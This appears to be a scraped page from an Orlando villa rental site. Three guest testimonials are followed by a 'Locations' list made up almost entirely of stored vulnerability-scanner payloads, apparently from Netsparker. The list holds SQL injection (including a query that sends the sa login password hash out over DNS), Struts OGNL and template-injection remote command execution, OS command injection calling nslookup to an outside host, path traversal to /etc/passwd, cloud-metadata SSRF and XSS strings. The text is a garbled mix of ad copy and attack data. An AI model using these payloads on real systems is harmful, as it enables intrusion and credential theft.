- "Beautiful, just beautiful. Kids loved the pool and spa, Dave loved the big-screen TV, and the internet let me keep up with work." — Debbie Bates
- "We had a very nice month of March in the Oasis Villa. Found the house very clean & the pool heated to our satisfaction. It is in a very well kept & very quiet community. Very close to all Restaurants & Stores. Would recommend it to everybody." — Joe Bower
- "We had a memorable time; the home was beautiful and clean. It was perfect: a comfortable home away from home. Disney and Universal were approx. 30 min away, and it was extremely close to shopping. Our family had a wonderful time." — Yasmina Garcia
|
Locations |
|
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 |
|
|
+print(int)0xFFF9999-74007;// |
|
|
1');SELECT pg_sleep(25)-- |
|
|
www.orlandovillas4u.com/trace.axd |
|
|
http://169.254.169.254/opc/v1/instance |
|
|
gethostbyname(trim('lzwjvpavdctpphsxgnlojf7fc7rqkcjg_ximlqe-'.'_lg.r87.me')) |
|
|
'{${gethostbyname(trim('lzwjvpavdcya-nkbrfklhgiz4mys6o_kocxb2x3a'.'kaq.r87.me'))}}' |
|
|
"+gethostbyname(lc 'lzwjvpavdcmhxewl2r2qwj-tttn2xecz03vdonjq'.'eyo.r87.me')+" |
|
|
p "#{0xFFF9999.to_i-`echo 17243`.to_i}" |
|
|
n;ns:expression(netsparker(0x06DCD3)); |
|
|
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.lzwjvpavdcqeqign-tgbz1fpmqlcpx8lh6kp1nop'+'yi0.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''') |
|
|
/../../../../../../../../../../var/log/nginx/access.log |
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "lzwjvpavdcagtmqqkqxmj1dtv7irya56vvn3xndk"uoe.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
/../../../../../../../../../../etc/httpd/logs/error_log |
|
|
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdch-flgfcm29eyxgyt5gvffv3ryndend'+'iue.r87.me')exec sp_executesql @r-- |
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd |
|
|
//lzwjvpavdckwhdj9g-48jggqotlfkg6xzmccfjfwht0.r87.me |
|
|
1'));SELECT pg_sleep(25)-- |
|
|
https://metadata.packet.net/metadata |
|
|
php://filter//resource=http://lzwjvpavdckmjzrh86a7-jikt9vlx7dyqz7c7m_x_0b.r87.me/p/ |
|
|
/../../../../../../../../../../opt/lampp/logs/access_log |
|
|
((select sleep(25)))a-- 1 |
|
|
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='56227').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
|
|
__import__('os').popen(('expr 268409241 - {0}').format('55504')).read() |
|
|
1;expr 268409241 - 90136;x |
|
|
nslookup lzwjvpavdc3t66zfylvjo_wcejzdlqdxfheioeci^ki8.r87.me&'\"`0&nslookup lzwjvpavdc3t66zfylvjo_wcejzdlqdxfheioeci^ki8.r87.me&`' |
|
|
{{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbHp3anZwYXZkY2MydW55d3R5eHZ1YnAxZHNqcXhpeWd3Y2xhcjFudnZ2Zy5yODcubWU=')).read()}} |
|
|
createobject("WScript.Shell").exec("nslookup lzwjvpavdchwp02mgy2dbhk5b8tjsgqasrfdzv13" & "ijs.r87.me").StdOut.ReadAll |
|
|
body{x:expression(netsparker(0x06DCEF))} |
|
|
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini |
|
|
/../../../../../../../../../../var/log/lighttpd/access.log |
|
|
SELECT dblink_connect('host=lzwjvpavdcjvuws1gdo_injvab71srte1tz4g-wd'||'enw.r87.me user=a password=a connect_timeout=2') |
|
|
'"@-->netsparker(0x06DE37) |
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd |
|
|
1;exec('xp_dirtree ''\\lzwjvpavdc0-onpgkvy_tjnejhz7-rcha4qoqjed'+'gmi.r87.me'+'\c$\a''')-- |
|
|
1));SELECT pg_sleep(25)-- |
|
|
/../../../../../../../../../../var/log/apache2/error.log |
|
|
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
|
|
'+print(int)0xFFF9999-73072+' |
|
|
' WAITFOR DELAY '0:0:25'-- |
|
|
http://aws.r87.me/latest/meta-data/public-hostname |
|
|
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
|
|
1 WAITFOR DELAY '0:0:25'-- |
|
|
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
gethostbyname(trim('lzwjvpavdc_qzftrnadr0ezhdwn2-bcxxdlic0a6'.'3kq.r87.me')); |
|
|
/../../../../../../../../../../AppServ/Apache24/logs/access.log |
|
|
"& SET /A 0xFFF9999-19988 & |
|
|
{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnYkhwM2FuWndZWFprWTNObWVteHliMmg1WW05cE5YcHBlSFJsY0hKamFXdDJkbWQ1Y1c1MWFXVnpaeTV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %} |
|
|
& nslookup lzwjvpavdcmhjbkmjoat6a64vtn1ekx8aqambmbz^oru.r87.me&'\"`0&nslookup lzwjvpavdcmhjbkmjoat6a64vtn1ekx8aqambmbz^oru.r87.me&`' |
|
|
__import__('os').popen(('SET /A 268409241 - {0}').format('30853')).read() |
|
|
lzwjvpavdcrpkolkgkj6mmcekl3sm5yzius4gsowfrt.r87.me/p/ |
|
|
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
|
|
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) |
|
|
http://r87.me/r/?id=lzwjvpavdcj25zbdopxj6gt9okpxj2xwkf71t-_uqr4 |
|
|
print localtime()*0+0xFFF9999-40206 |
|
|
'"-->netsparker(0x06DB54) |
|
|
"& ping -n 25 127.0.0.1 & |
|
|
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) |
|
|
1/../../../../../../../../../../../etc/passwd |
|
|
dblink_connect('host=lzwjvpavdctcekixjuwgvlj9xgupfmqrl2o57kri'||'coi.r87.me user=a password=a connect_timeout=2') |
|
|
/../../../../../../../../../../boot.ini |
|
|
-1';exec('xp_dirtree ''\\lzwjvpavdcsh1yjqg61bja__zjmcqan8f8eo_dz1'+'4wm.r87.me'+'\c$\a''')-- |
|
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdczw7fweuxljbic5vmme7rbmvp0cj2w1" & "roa.r87.me").StdOut.ReadAll |
|
|
/../../../../../../../../../../var/log/apache/error.log |
|
|
../../../../../../../../../../xampp/apache/logs/access.log |
|
|
%22%2bnetsparker(0x06DEB0)%2b%22 |
|
|
*/netsparker(0x06DD0A);/* |
|
|
http://169.254.169.254/latest/meta-data/public-hostname |
|
|
'& SET /A 0xFFF9999-53775 & |
|
|
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini |
|
|
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' |
|
|
1) WAITFOR DELAY '0:0:25'-- |
|
|
= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkYzN0bGR6dGpoZWZ3ZzJoYW9jbTV5bmp5cmRzeTRkcW5hby5yODcubWU=','base64').toString()) |
|
|
'& nslookup lzwjvpavdcofrsuhktvuj15u19b9ld5ihddf7uhi^qag.r87.me&'\"`0&nslookup lzwjvpavdcofrsuhktvuj15u19b9ld5ihddf7uhi^qag.r87.me&`' |
|
|
response.write(268409241-80122)' |
|
|
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06DB92%29%3C%2FscRipt%3E |
|
|
/../../../../../../../../../../var/log/apache/access.log |
|
|
'& ping -n 25 127.0.0.1 & |
|
|
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 |
|
|
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
/../../../../../../../../../../boot.ini .cfm |
|
|
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
cast((SELECT dblink_connect('host=lzwjvpavdcyynatfmhtbfh1c36m0olt-pgwe24ic'||'duo.r87.me user=a password=a connect_timeout=2')) as numeric) |
|
|
"+print(int)0xFFF9999-79957+" |
|
|
') WAITFOR DELAY '0:0:25'-- |
|
|
/../../../../../../../../../../proc/version |
|
|
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
|
|
eval('print localtime()*0+0xFFF9999-81994') |
|
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcxrleq9hpcchdiajeivkhx5gwu-wyc0" & "bkg.r87.me").StdOut.ReadAll+ |
|
|
& SET /A 0xFFF9999-79316 & |
|
|
1) exec('xp_dirtree ''\\lzwjvpavdcglv1hqcxd_ksnqzrofr3n4x_j1umqt'+'hzc.r87.me'+'\c$\a''')-- |
|
|
<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkY2p0Mm5qeGtzaGRwOWJxaTUtY2RlMmIxODFicHp2bHA5cS5yODcubWU=','base64').toString()) %> |
|
|
+gethostbyname(trim('lzwjvpavdcnpcwvjbra03po6z4aunnuzvawzuykn'.'5i4.r87.me'));// |
|
|
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
+response.write(268409241-24713)' |
|
|
/../../../../../../../../../../web.config |
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini |
|
|
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDZEQkI5KTwvc2NyaXB0Pg== |
|
|
"& nslookup lzwjvpavdcvu5dpg454xep-jv9chlvegsj4yvxgp^tee.r87.me&'\"`0&nslookup lzwjvpavdcvu5dpg454xep-jv9chlvegsj4yvxgp^tee.r87.me&`' |
|
|
')) WAITFOR DELAY '0:0:25'-- |
|
|
1/../../../../../../../../../../boot.ini |
|
|
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(45)||chr(106)||chr(118)||chr(118)||chr(120)||chr(122)||chr(116)||chr(99)||chr(117)||chr(55)||chr(114)||chr(106)||chr(112)||chr(105)||chr(100)||chr(114)||chr(57)||chr(117)||chr(118)||chr(100)||chr(116)||chr(117)||chr(115)||chr(55)||chr(104)||chr(115)||chr(53)||chr(98)||chr(116)||chr(105)||chr(118)||chr(120)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric) |
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
|
|
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
|
|
/../../../../../../../../../../proc/version .cfm |
|
|
{php}Smarty_Resource::parseResourceName(system("nslookup lzwjvpavdcpmnncr4j8omglc0g-jnxs66guk7ixv"."t7c.r87.me"),'b');{/php} |
|
|
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" |
|
|
1)) WAITFOR DELAY '0:0:25'-- |
|
|
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
|
|
'+print localtime()*0+0xFFF9999-72452+' |
|
|
"+response.write(268409241-92189)+" |
|
|
<%createobject("WScript.Shell").exec("nslookup lzwjvpavdcmhksvi9ywssiuyl-o2gcxgxarvwcnx" & "q1c.r87.me").StdOut.ReadAll%> |
|
|
'||(SELECT dblink_connect('host=lzwjvpavdcsixdo7tudiiweeo8f9q4bezfo3zzsz'||'oqg.r87.me user=a password=a connect_timeout=2'))||' |
|
|
1')exec('xp_dirtree ''\\lzwjvpavdcvlzmx2nxsvdxajo1ialjkw5578ykhl'+'qxg.r87.me'+'\c$\a''')-- |
|
|
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) |
|
|
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
|
|
'" ns=netsparker(0x06DBE3) |
|
|
=(int)0xFFF9999-40449;//?> |
|
|
nslookup "lzwjvpavdc4z8rwxfyiyd-tqskrd0ofxji6qixd_""o_w.r87.me" |
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini |
|
|
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
|
|
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
php://filter//resource=http://r87.com/n? .cfm |
|
|
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
|
|
/../../../../../../../../../../../etc/passwd |
|
|
'+gethostbyname(trim('lzwjvpavdcvv2egv-lwp3lebsohebfqhah6qvwsr'.'puu.r87.me'))+' |
|
|
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup lzwjvpavdcp25f5om5gc8-iqd7jwxz_hhgyw3cys"~"4yo.r87.me")}} |
|
|
https://www.orlandovillas4u.com/elmah |
|
|
/../../../../../../../../../../windows/win.ini |
|
|
http://r87.com/?www.orlandovillas4u.com/ |
|
|
add_neighborhood_process.cfm |
|
|
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" |
|
|
(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdcoydhfn8cfoqk2qe5rd5ecflnovnq8s'||'uiw.r87.me') from DUAL) |
|
|
<% response.write(268409241-75159) %> |
|
|
1))exec('xp_dirtree ''\\lzwjvpavdc8gdaz0agzvg0yg9myheefp7gp1zpgw'+'tki.r87.me'+'\c$\a''')-- |
|
|
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) |
|
|
"&ping -w 25 127.0.0.1 &" |
|
|
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
"+print localtime()*0+0xFFF9999-23988+" |
|
|
javascript:netsparker(0x06DC99) |
|
|
"+createobject("WScript.Shell").exec("nslookup lzwjvpavdc53xc1i7j453mim8jtojozfldeyc6br" & "rvo.r87.me").StdOut.ReadAll+" |
|
|
&nslookup "lzwjvpavdcrtjtuot0vhjsmf_czzwikofidipm8p""b0s.r87.me" |
|
|
<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgbHp3anZwYXZkY2tiZjlwaHZ5YmlvaTFkLWtka3piYmhrODZnbzJ3eDd5aS5yODcubWU=')})).to_s}" %> |
|
|
http://example.com/?
ns: netsparker056650=vuln |
|
|
1 ns=netsparker(0x06DC16) |
|
|
\';netsparker(0x06DD70);/// |
|
|
/../../../../../../../../../../windows/iis6.log |
|
|
<#assign x=268409241 - 98803>
${x?string["0"]} |
|
|
ns@mail.ns'"/>()%26%25netsparker(0x06E09B) |
|
|
add_neighborhood_process.cfm |
|
|
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
|
|
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdczzjuna__agagbmpv2h6z-2pthldpi3'||'4co.r87.me') from DUAL)))) |
|
|
www.orlandovillas4u.com/elmah |
|
|
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' |
|
|
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<
|
|
|
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
{php}print(int)0xFFF9999-73910;{/php} |
|
|
'&nslookup "lzwjvpavdcj5gman2wtkd-q-dxr8lrczq4a3z2xj""bdw.r87.me" |
|
|
print(int)0xFFF9999-98563 |
|
|
gethostbyname(lc 'lzwjvpavdcxudqctj4gkiu0io5ofzvlji4urydik'.'33q.r87.me') |
|
|
1'))exec('xp_dirtree ''\\lzwjvpavdcfa8jjqulqszhi4yhrihjfptw1udoeh'+'jpq.r87.me'+'\c$\a''')-- |
|
|
arguments[1].end(require('child_process').execSync('expr 268409241 - 9402')) |
|
|
/admin/add_neighborhood_process.cfm |
|
|
"+gethostbyname(trim('lzwjvpavdceuppmtwfahfn0tzypzeaa3d3fjm8ud'.'vas.r87.me'))+" |
|
|
'&ping -w 25 127.0.0.1 &' |
|
|
Content-Type:text/html
ns(0x06E0DD) |
|
|
/../../../../../../../../../../../etc/passwd |
|
|
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
|
|
http://62.106.91.181:3306 |
|
|
/../../../../../../../../../../proc/self/fd/2 |
|
|
ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... |
|
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdc6wkwpkg5aljnipsmscof8x4lydrf3i'||'2oe.r87.me') from DUAL))||' |
|
|
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup lzwjvpavdcqnxbesa280t1sikb6l8rlifnjjelzk"+"_8k.r87.me") } |
|
|
//r87.com/n/n.css?0x06DC3D |
|
|
<%= "#{268409241-32368}" %> |
|
|
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 |
|
|
http://r87.com/?www.orlandovillas4u.com/ |
|
|
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
";l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdck9jd1zmckozrmwedlph-sp2ffcrkxx"+"xa0.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
"&nslookup "lzwjvpavdctahjh4rzdceo6lh5msmynnk8e2geby""w-a.r87.me" |
|
|
|expr${IFS}268409241${IFS}-${IFS}44507 |
|
|
1";expr 268409241 - 3350;" |
|
|
//r87.com/?http://www.orlandovillas4u.com/ |
|
|
https://www.orlandovillas4u.com/elmah.axd |
|
|
eval('gethostbyname(lc 'lzwjvpavdc-41nxwsczkkq8ru4jlg6zqwmzzsb1a'.'hra.r87.me')') |
|
|
r87.com/?www.orlandovillas4u.com/ |
|
|
syscolumns WHERE 2>3;exec('xp_dirtree ''\\lzwjvpavdcobdggu0bzgnwsi05uhuy9v_hh7fayg'+'abk.r87.me'+'\c$\a''')-- |
|
|
arguments[1].end(require('child_process').execSync('set /A 268409241 - 87281')) |
|
|
/../../../../../../../../../../../etc/passwd .cfm |
|
|
https://www.orlandovillas4u.com/trace.axd |
|
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(100)||chr(115)||chr(112)||chr(119)||chr(111)||chr(114)||chr(101)||chr(116)||chr(105)||chr(99)||chr(122)||chr(105)||chr(115)||chr(118)||chr(122)||chr(97)||chr(113)||chr(100)||chr(116)||chr(101)||chr(122)||chr(100)||chr(51)||chr(119)||chr(49)||chr(119)||chr(103)||chr(115)||chr(104)||chr(102)||chr(114)||chr(111)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL) |
|
|
require 'resolv';Resolv.getaddress ("lzwjvpavdcyvsfn8yynecegloekiva10vwkcwukx".concat "fh0.r87.me") |
|
|
r87.com/?http://www.orlandovillas4u.com/ |
|
|
print(int)0xFFF9999-52857; |
|
|
r87.com/?https://www.orlandovillas4u.com/ |
|
|
'{${print(int)0xFFF9999-87437}}' |
|
|
/../../../../../../../../../../WEB-INF/web.xml |
|
|
/\r87.com/?www.orlandovillas4u.com/ |
|
|
1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ |
|
|
/../../../../../../../../../../proc/self/fd/2 .cfm |
|
|
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1 |
|
|
|nslookup${IFS}"lzwjvpavdcamiy80xxfoqex_3fupx50ndxkc1fqg""jf0.r87.me" |
|
|
gethostbyname(trim('lzwjvpavdcetpgwpquyrubrovzf5s9ve1n4xrryn'.'pau.r87.me'));//?> |
|
|
///r87.com/?www.orlandovillas4u.com/ |
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
|
|
<%a style=x:expre/**/ssion(netsparker(0x06DCB5))> |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(105)||chr(103)||chr(120)||chr(119)||chr(116)||chr(105)||chr(97)||chr(122)||chr(99)||chr(48)||chr(52)||chr(99)||chr(100)||chr(97)||chr(101)||chr(109)||chr(122)||chr(113)||chr(105)||chr(102)||chr(54)||chr(107)||chr(98)||chr(118)||chr(102)||chr(99)||chr(113)||chr(116)||chr(54)||chr(105)||chr(51)||chr(108)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)))) |
|
|
__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbHp3anZwYXZkY2pkZmIweXJyc3NtYWprbng1N3Vwb2NjOS1oN3UxeThhdS5yODcubWU=')).read() |
|
|
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcixr4lrvyrtmduafuuo2zfkmunlyivk'+'a98.r87.me')exec sp_executesql @r |
|
|
...//...//...//...//...//...//...//...//...//...//...//etc/passwd |
|
|
www.orlandovillas4u.com.r87.com/? |
|
|
/../../../../../../../../../../windows/win.ini .cfm |
|
|
'+gethostbyname(lc 'lzwjvpavdcenjkeywqen-ii6a2fj4ocrvwzh12if'.'vom.r87.me')+' |
|
|
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-28957)} |
|
|
lzwjvpavdc5bv9zjazqwa5gc0wwcyy94uix3urxokum.r87.me |
|
|
exec('xp_dirtree ''\\lzwjvpavdcyla0u7f4ay3btdkl5wpnmwly5saukz'+'oiq.r87.me'+'\c$\a''') |
|
|
https://www.orlandovillas4u.com/server-status |
|
|
/../../../../../../../../../../var/log/apache2/access.log |
|
|
http://www.orlandovillas4u.com.r87.com/? |
|
|
';l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdc-emk_etasewks6yyozq6rc4yo7dwqx"+"vky.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
https://www.orlandovillas4u.com.r87.com/? |
|
|
1';expr 268409241 - 47144;' |
|
|
www.orlandovillas4u.com/elmah.axd |
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."lzwjvpavdca83x6pbhxpxtzt2b4oqa_wim9nmo0e""pge.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
